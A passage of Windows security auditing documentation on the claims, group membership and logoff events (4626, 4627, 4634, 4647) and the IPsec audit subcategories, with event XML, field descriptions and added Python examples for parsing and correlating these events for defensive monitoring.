typically has “-“ value. For computer accounts this field has device claims listed.

Security Monitoring Recommendations

For 4626(S): User/Device claims information.
Typically this action is reported by the NULL SID account, so we recommend reporting all events with
“Subject\Security ID” not equal “NULL SID”.
If you need to monitor account logons with specific claims, you can monitor for 4626 and check User
Claims\Device Claims fields.
If you have specific requirements, such as:
Users with specific claims should not access specific computers;
Computer account should not have specific claims;
User account should not have specific claims;
Claim should not be empty
And so on…
You can monitor for 4626 and check User Claims\Device Claims fields.
If you need to monitor computer/user logon attempts only and you don’t need information about claims,
then it is better to monitor “4624: An account was successfully logged on.”
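As an added illustration (not code from the original page or from Microsoft), here is a Python example that parses the claim-entry format described above and applies the checks listed in these recommendations. It assumes the 4626 fields have already been extracted into a dictionary keyed by the event's Data names (Computer, SubjectUserSid, TargetUserName, TargetDomainName, UserClaims, DeviceClaims); the sample event, its second department claim and the policy rules are constructed for the illustration, and claim entries are assumed to be separated by line breaks when a field holds more than one.

```python
import re

# One entry of the "User Claims" / "Device Claims" field, in the format described above:
#   ad://ext/cn:88d2b96fdb2b4c49 <String> : "dadmin"
# Straight and curly quotes are both accepted, since the field is rendered either way.
CLAIM_RE = re.compile(
    r'^ad://ext/(?P<name>[^:\s]+):(?P<claim_id>[0-9a-fA-F]+)\s+'
    r'<(?P<ctype>[^>]+)>\s*:\s*[“"](?P<value>[^”"]*)[”"]$'
)
NULL_SID = "S-1-0-0"  # rendered as "NULL SID"; the usual Subject of 4626


def parse_claims(field):
    """Split a claims field into (name, claim_id, type, value) tuples.
    "-" (or an empty field) means no claims were included."""
    if field.strip() in ("", "-"):
        return []
    claims = []
    for line in field.splitlines():
        line = line.strip()
        if not line:
            continue
        m = CLAIM_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised claim entry: {line!r}")
        claims.append((m["name"], m["claim_id"], m["ctype"], m["value"]))
    return claims


def check_4626(event, policy):
    """Apply the monitoring recommendations above to one 4626 event.
    `event` maps Data Name -> value; `policy` is our own (hypothetical) rule set.
    Returns a list of finding strings; an empty list means nothing to report."""
    findings = []
    account = f'{event["TargetDomainName"]}\\{event["TargetUserName"]}'
    # Rule 1: the Subject is normally NULL SID; anything else is worth a look.
    if event["SubjectUserSid"] != NULL_SID:
        findings.append(f"Subject\\Security ID is not NULL SID: {event['SubjectUserSid']}")
    # Computer accounts end in "$" and carry Device Claims; user accounts carry User Claims.
    is_computer = event["TargetUserName"].endswith("$")
    claims = parse_claims(event["DeviceClaims"] if is_computer else event["UserClaims"])
    kind = "device" if is_computer else "user"
    # Rule 2: "claim should not be empty".
    if not claims and policy.get("require_claims"):
        findings.append(f"{account}: claims field is empty")
    for name, _claim_id, _ctype, value in claims:
        # Rule 3: accounts should not carry specific claims.
        if (name, value) in policy.get("forbidden_claims", set()):
            findings.append(f"{account}: {kind} claim {name}={value} is not allowed")
        # Rule 4: users with specific claims should not access specific computers.
        if event["Computer"] in policy.get("computer_deny", {}).get((name, value), set()):
            findings.append(f"{account}: {kind} claim {name}={value} may not access {event['Computer']}")
    return findings


# Constructed sample: the dadmin entry from the page plus a second, made-up "department" claim.
SAMPLE_4626 = {
    "Computer": "WIN-GG82ULGC9GO.contoso.local",
    "SubjectUserSid": "S-1-0-0",
    "TargetUserName": "dadmin",
    "TargetDomainName": "CONTOSO",
    "UserClaims": 'ad://ext/cn:88d2b96fdb2b4c49 <String> : "dadmin"\n'
                  'ad://ext/department:1a2b3c4d5e6f7a8b <String> : "Finance"',
    "DeviceClaims": "-",
}
# Constructed computer-account event whose device claims were left empty.
SAMPLE_4626_COMPUTER = {**SAMPLE_4626, "TargetUserName": "WIN-GG82ULGC9GO$",
                        "UserClaims": "-", "DeviceClaims": "-"}
# Hypothetical policy: no contractors, and Finance-tagged users stay off this host.
POLICY = {
    "require_claims": True,
    "forbidden_claims": {("department", "Contractors")},
    "computer_deny": {("department", "Finance"): {"WIN-GG82ULGC9GO.contoso.local"}},
}

if __name__ == "__main__":
    for ev in (SAMPLE_4626, SAMPLE_4626_COMPUTER):
        print(ev["TargetUserName"], check_4626(ev, POLICY))
```

The parser raises on an entry it does not recognise rather than silently skipping it, so a change in the field's rendering shows up as an error instead of as a quietly empty claim list.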
Audit Group Membership
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Group Membership enables you to audit group memberships when they are enumerated on the client
computer.
This policy allows you to audit the group membership information in the user's logon token. Events in this
subcategory are generated on the computer on which a logon session is created.
For an interactive logon, the security audit event is generated on the computer that the user logged on to. For a
network logon, such as accessing a shared folder on the network, the security audit event is generated on the
computer hosting the resource.
You must also enable the Audit Logon subcategory.
Multiple events are generated if the group membership information cannot fit in a single security audit event.
Event volume:
Low on a client computer.
Medium on a domain controller or network servers.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   Yes               No                Yes                No
Member Server       Yes               No                Yes                No
Workstation         Yes               No                Yes                No
Comments (the same for all three computer types): Group membership information for the logged-in user can help to detect that a member of a specific domain or local group logged in to the machine (for example, a member of database administrators, built-in local administrators, domain administrators, a service accounts group or other high-value groups). For recommendations for using and analyzing the collected information, see the Security Monitoring Recommendations sections. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4627(S): Group membership information.
4627(S): Group membership information.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Group Membership
Event Description:
This event generates with “4624(S): An account was successfully logged on” and shows the list of groups that the logged-on account belongs to.
You must also enable the Success audit for Audit Logon subcategory to get this event.
Multiple events are generated if the group membership information cannot fit in a single security audit event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4627</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12554</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-12T03:51:25.843673000Z" />
<EventRecordID>3081</EventRecordID>
<Correlation ActivityID="{913FBE70-1CE6-0000-67BF-3F91E61CD101}" />
<Execution ProcessID="736" ThreadID="808" />
<Channel>Security</Channel>
<Computer>WIN-GG82ULGC9GO.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-0-0</Data>
<Data Name="SubjectUserName">-</Data>
<Data Name="SubjectDomainName">-</Data>
<Data Name="SubjectLogonId">0x0</Data>
<Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x569860</Data>
<Data Name="LogonType">3</Data>
<Data Name="EventIdx">1</Data>
<Data Name="EventCountTotal">1</Data>
<Data Name="GroupMembership">%{S-1-5-21-1377283216-344919071-3415362939-513} %{S-1-1-0} %{S-1-5-32-544} %{S-1-5-32-545} %{S-1-5-32-554} %{S-1-5-2} %{S-1-5-11} %{S-1-5-15} %{S-1-5-21-1377283216-344919071-3415362939-512} %{S-1-5-21-1377283216-344919071-3415362939-572} %{S-1-5-64-10} %{S-1-16-12288}</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that reported information about the successful logon or invoked it. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that reported information about
successful logon or invokes it.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4672(S): Special privileges assigned to new logon.”
Logon Type [Type = UInt32]: the type of logon which was performed. The table below contains the list of possible
values for this field:

Logon Type   Logon Title         Description
2            Interactive         A user logged on to this computer.
3            Network             A user or computer logged on to this computer from the network.
4            Batch               Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.
5            Service             A service was started by the Service Control Manager.
7            Unlock              This workstation was unlocked.
8            NetworkCleartext    A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).
9            NewCredentials      A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
10           RemoteInteractive   A user logged on to this computer remotely using Terminal Services or Remote Desktop.
11           CachedInteractive   A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.

New Logon:
Security ID [Type = SID]: SID of account for which logon was performed. Event Viewer automatically tries to
resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which logon was performed.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4672(S): Special privileges assigned to new logon.”
Event in sequence [Type = UInt32]: If there is not enough space in one event to put all groups, you will see “1 of N” in this field and additional events will be generated. Typically this field has the value “1 of 1”.
Group Membership [Type = UnicodeString]: the list of group SIDs that the logged-on account belongs to (is a member of). Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Security Monitoring Recommendations


For 4627(S): Group membership information.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this action is reported by the NULL SID account, so we recommend reporting all events with “Subject\Security ID” not equal to “NULL SID”.
If you need to track that a member of a specific group logged on to a computer, check the “Group
Membership” field.
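The following Python example is added here and is not part of the original page or Microsoft's own tooling. It parses the Event XML above, merges events that report “1 of N” membership parts (the Event in sequence field, carried as EventIdx and EventCountTotal) into one record per Logon ID, and flags membership in high-value groups as the recommendation suggests. The set of groups treated as high value (BUILTIN\Administrators, Domain Admins, Schema Admins, Enterprise Admins) is our choice; the multi-part sample events are constructed, with the SIDs taken from the page's example event, and the System block is trimmed to the elements the code reads.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SID_RE = re.compile(r"%\{(S-1-[0-9-]+)\}")   # each group is rendered as %{SID}

# Groups worth alerting on. The SIDs/RIDs are standard Windows values; which ones count as
# "high value" is our choice for this example, not something the page prescribes.
HIGH_VALUE_BUILTIN = {"S-1-5-32-544": "BUILTIN\\Administrators"}
HIGH_VALUE_DOMAIN_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}


def parse_4627(xml_text):
    """Pull the fields this check needs out of one 4627 event."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", EVT_NS)}
    return {
        "computer": root.findtext("e:System/e:Computer", namespaces=EVT_NS),
        "subject_sid": data["SubjectUserSid"],
        "account": f'{data["TargetDomainName"]}\\{data["TargetUserName"]}',
        "logon_id": data["TargetLogonId"],
        "logon_type": int(data["LogonType"]),
        "idx": int(data["EventIdx"]),            # "Event in sequence": k of N
        "total": int(data["EventCountTotal"]),
        "groups": SID_RE.findall(data["GroupMembership"]),
    }


def merge_parts(events):
    """Combine the "k of N" parts of one logon (same computer and Logon ID) into a single
    record. The record is marked complete only once every part 1..N has been seen, so a
    partial membership list is never mistaken for the whole."""
    parts = defaultdict(dict)
    for ev in events:
        parts[(ev["computer"], ev["logon_id"])][ev["idx"]] = ev
    merged = []
    for by_idx in parts.values():
        first = by_idx[min(by_idx)]
        groups = []
        for i in sorted(by_idx):
            for sid in by_idx[i]["groups"]:
                if sid not in groups:
                    groups.append(sid)
        merged.append({**first, "groups": groups,
                       "complete": set(by_idx) == set(range(1, first["total"] + 1))})
    return merged


def high_value_groups(sids):
    """Map each SID in the list that is a high-value group to its friendly name."""
    hits = {}
    for sid in sids:
        if sid in HIGH_VALUE_BUILTIN:
            hits[sid] = HIGH_VALUE_BUILTIN[sid]
            continue
        pieces = sid.split("-")
        # Domain group SIDs look like S-1-5-21-<d1>-<d2>-<d3>-<RID>: eight dash-separated pieces.
        if sid.startswith("S-1-5-21-") and len(pieces) == 8 and int(pieces[-1]) in HIGH_VALUE_DOMAIN_RIDS:
            hits[sid] = HIGH_VALUE_DOMAIN_RIDS[int(pieces[-1])]
    return hits


def report(xml_events):
    """One (logon id, complete?, high-value group names) row per logon session."""
    return [(s["logon_id"], s["complete"], sorted(high_value_groups(s["groups"]).values()))
            for s in merge_parts(parse_4627(x) for x in xml_events)]


def make_4627(logon_id, idx, total, group_sids, computer="WIN-GG82ULGC9GO.contoso.local"):
    """Constructed 4627 event with the same layout as the Event XML above (trimmed System block)."""
    groups = " ".join(f"%{{{s}}}" for s in group_sids)
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4627</EventID><Computer>{computer}</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-0-0</Data>
<Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">{logon_id}</Data>
<Data Name="LogonType">3</Data>
<Data Name="EventIdx">{idx}</Data>
<Data Name="EventCountTotal">{total}</Data>
<Data Name="GroupMembership">{groups}</Data>
</EventData>
</Event>"""


DOMAIN = "S-1-5-21-1377283216-344919071-3415362939"
PAGE_GROUPS = [f"{DOMAIN}-513", "S-1-1-0", "S-1-5-32-544", "S-1-5-32-545", "S-1-5-32-554",
               "S-1-5-2", "S-1-5-11", "S-1-5-15", f"{DOMAIN}-512", f"{DOMAIN}-572",
               "S-1-5-64-10", "S-1-16-12288"]
SAMPLE_EVENTS = [
    make_4627("0x569860", 1, 1, PAGE_GROUPS),       # the page's own single-part event
    make_4627("0x5a1000", 1, 2, PAGE_GROUPS[:6]),   # constructed: membership split "1 of 2" ...
    make_4627("0x5a1000", 2, 2, PAGE_GROUPS[6:]),   # ... and "2 of 2"
    make_4627("0x5b2000", 1, 2, PAGE_GROUPS[:2]),   # constructed: "1 of 2" whose part 2 never came
]

if __name__ == "__main__":
    for row in report(SAMPLE_EVENTS):
        print(row)
```

Keying the merge on computer name plus Logon ID matters because, as the field descriptions note, a Logon ID is only unique between reboots of one computer; a session whose parts are still incomplete is reported with `complete` set to False so the analyst knows the list may be missing groups rather than seeing a false negative.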
Audit IPsec Extended Mode
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit IPsec Extended Mode allows you to audit events generated by the Internet Key Exchange protocol (IKE) and Authenticated Internet Protocol (AuthIP) during Extended Mode negotiations.
The Audit IPsec Extended Mode subcategory is out of scope of this document, because this subcategory is mainly used for IPsec Extended Mode troubleshooting.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   IF                IF                IF                 IF
Member Server       IF                IF                IF                 IF
Workstation         IF                IF                IF                 IF
Comments (the same for all three computer types): IF - This subcategory is mainly used for IPsec Extended Mode troubleshooting, or for tracing or monitoring IPsec Extended Mode operations.

4978(S): During Extended Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
4979(S): IPsec Main Mode and Extended Mode security associations were established.
4980(S): IPsec Main Mode and Extended Mode security associations were established.
4981(S): IPsec Main Mode and Extended Mode security associations were established.
4982(S): IPsec Main Mode and Extended Mode security associations were established.
4983(S): An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.
4984(S): An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.
Audit IPsec Main Mode
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit IPsec Main Mode allows you to audit events generated by the Internet Key Exchange protocol (IKE) and Authenticated Internet Protocol (AuthIP) during Main Mode negotiations.
The Audit IPsec Main Mode subcategory is out of scope of this document, because this subcategory is mainly used for IPsec Main Mode troubleshooting.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   IF                IF                IF                 IF
Member Server       IF                IF                IF                 IF
Workstation         IF                IF                IF                 IF
Comments (the same for all three computer types): IF - This subcategory is mainly used for IPsec Main Mode troubleshooting, or for tracing or monitoring IPsec Main Mode operations.

4646(S): Security ID: %1
4650(S): An IPsec Main Mode security association was established. Extended Mode was not enabled. Certificate authentication was not used.
4651(S): An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.
4652(F): An IPsec Main Mode negotiation failed.
4653(F): An IPsec Main Mode negotiation failed.
4655(S): An IPsec Main Mode security association ended.
4976(S): During Main Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
5049(S): An IPsec Security Association was deleted.
5453(S): An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.
Audit IPsec Quick Mode
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit IPsec Quick Mode allows you to audit events generated by the Internet Key Exchange protocol (IKE) and Authenticated Internet Protocol (AuthIP) during Quick Mode negotiations.
The Audit IPsec Quick Mode subcategory is out of scope of this document, because this subcategory is mainly used for IPsec Quick Mode troubleshooting.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   IF                IF                IF                 IF
Member Server       IF                IF                IF                 IF
Workstation         IF                IF                IF                 IF
Comments (the same for all three computer types): IF - This subcategory is mainly used for IPsec Quick Mode troubleshooting, or for tracing or monitoring IPsec Quick Mode operations.

4977(S): During Quick Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
5451(S): An IPsec Quick Mode security association was established.
5452(S): An IPsec Quick Mode security association ended.
Audit Logoff
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Logoff determines whether the operating system generates audit events when logon sessions are
terminated.
These events occur on the computer that was accessed. In the case of an interactive logon, these events are
generated on the computer that was logged on to.
There is no failure event in this subcategory because failed logoffs (such as when a system abruptly shuts down)
do not generate an audit record.
Logon events are essential to understanding user activity and detecting potential attacks. Logoff events are not
100 percent reliable. For example, the computer can be turned off without a proper logoff and shutdown; in this
case, a logoff event is not generated.
Event volume: High.
This subcategory allows you to audit events generated by the closing of a logon session. These events occur on
the computer that was accessed. For an interactive logoff the security audit event is generated on the computer
that the user account logged on to.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   No                No                Yes                No
Member Server       No                No                Yes                No
Workstation         No                No                Yes                No
Comments (the same for all three computer types): This subcategory typically generates a huge amount of “4634(S): An account was logged off.” events, which typically have little security relevance. It is more important to audit Logon events using the Audit Logon subcategory, rather than Logoff events. Enable Success audit if you want to track, for example, how long a session was active (in correlation with Audit Logon events) and when the user actually logged off. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4634(S): An account was logged off.
4647(S): User initiated logoff.
4634(S): An account was logged off.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logoff
Event Description:
This event shows that a logon session was terminated and no longer exists.
The main difference between “4647: User initiated logoff.” and the 4634 event is that the 4647 event is generated when the logoff procedure was initiated by a specific account using the logoff function, and the 4634 event shows that the session was terminated and no longer exists.
4647 is more typical for Interactive and RemoteInteractive logon types when the user was logged off using standard methods. You will typically see both 4647 and 4634 events when the logoff procedure was initiated by the user.
It may be positively correlated with a “4624: An account was successfully logged on.” event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4634</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12545</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-09T02:27:57.877205900Z" />
<EventRecordID>230019</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="832" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserSid">S-1-5-90-1</Data>
<Data Name="TargetUserName">DWM-1</Data>
<Data Name="TargetDomainName">Window Manager</Data>
<Data Name="TargetLogonId">0x1a0992</Data>
<Data Name="LogonType">2</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that was logged off. Event Viewer automatically tries to resolve SIDs
and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that was logged off.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Logon Type [Type = UInt32]: the type of logon which was used. The table below contains the list of possible
values for this field:

Logon Type   Logon Title         Description
2            Interactive         A user logged on to this computer.
3            Network             A user or computer logged on to this computer from the network.
4            Batch               Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.
5            Service             A service was started by the Service Control Manager.
7            Unlock              This workstation was unlocked.
8            NetworkCleartext    A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).
9            NewCredentials      A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
10           RemoteInteractive   A user logged on to this computer remotely using Terminal Services or Remote Desktop.
11           CachedInteractive   A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.

Security Monitoring Recommendations


For 4634(S): An account was logged off.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
If a particular Logon Type should not be used by a particular account (for example, if Logon Type 4-Batch or 5-Service is used by a member of a domain administrative group), monitor this event for such actions.
4647(S): User initiated logoff.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logoff
Event Description:
This event is generated when a logoff is initiated. No further user-initiated activity can occur. This event can be interpreted as a logoff event.
The main difference from the “4634(S): An account was logged off.” event is that the 4647 event is generated when the logoff procedure was initiated by a specific account using the logoff function, and the 4634 event shows that the session was terminated and no longer exists.
4647 is more typical for Interactive and RemoteInteractive logon types when the user was logged off using standard methods. You will typically see both 4647 and 4634 events when the logoff procedure was initiated by the user.
It may be positively correlated with a “4624: An account was successfully logged on.” event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4647</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12545</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-09T03:08:39.126890800Z" />
<EventRecordID>230200</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="3864" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x29b379</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “logoff” operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “logoff” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Security Monitoring Recommendations


For 4647(S): User initiated logoff.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
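The recommendation for 4634 (watch for Logon Types an account should never use) and the correlation of 4624, 4647 and 4634 through the Logon ID described for both logoff events can be implemented together. The Python below is an added example, not code from the original page or from Microsoft: it keys sessions on the computer name plus Logon ID (because Logon IDs repeat across reboots and across machines), records whether a 4647 preceded the 4634, computes session length, and lists logoffs with no matching logon. The AuditEvent structure, the sample events and the deny list for CONTOSO\dadmin are constructed for the illustration; the Logon Type names are those from the table above.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

# Logon type names, as listed in the table above.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}


@dataclass
class AuditEvent:
    """The handful of fields from 4624 / 4634 / 4647 that the correlation needs."""
    time: datetime
    computer: str
    event_id: int
    logon_id: str
    account: str
    logon_type: Optional[int] = None  # present on 4624 and 4634, absent on 4647


def build_sessions(events):
    """Pair each 4624 with its later 4647 / 4634 on the same computer and Logon ID.
    Logon IDs are only unique per boot of one computer, so the key includes the computer name.
    Returns (sessions, orphans): orphans are logoff events with no matching logon seen."""
    sessions, orphans = {}, []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.computer, ev.logon_id)
        if ev.event_id == 4624:
            sessions[key] = {"computer": ev.computer, "logon_id": ev.logon_id, "account": ev.account,
                             "logon_type": LOGON_TYPES.get(ev.logon_type, str(ev.logon_type)),
                             "start": ev.time, "end": None, "user_initiated": False}
        elif key in sessions:
            if ev.event_id == 4647:
                sessions[key]["user_initiated"] = True   # the account called the logoff function
            elif ev.event_id == 4634:
                sessions[key]["end"] = ev.time           # the session no longer exists
        else:
            orphans.append(ev)
    return list(sessions.values()), orphans


def session_seconds(session):
    """How long the session was active, or None if no 4634 has been seen for it."""
    if session["end"] is None:
        return None
    return (session["end"] - session["start"]).total_seconds()


def logon_type_violations(events, disallowed):
    """Flag 4624/4634 events whose Logon Type is on the account's deny list
    (for example Batch or Service for a domain admin account)."""
    return [(ev.event_id, ev.computer, ev.account, LOGON_TYPES.get(ev.logon_type, str(ev.logon_type)))
            for ev in events
            if ev.logon_type is not None and ev.logon_type in disallowed.get(ev.account, set())]


def _t(s):
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed sample set: the DC01 records from the 4634/4647 examples above plus made-up
# companions. Logon ID 0x29b379 is deliberately reused on a second host (SRV01).
SAMPLE_EVENTS = [
    AuditEvent(_t("2015-09-09T02:27:57"), "DC01", 4634, "0x1a0992", "Window Manager\\DWM-1", 2),
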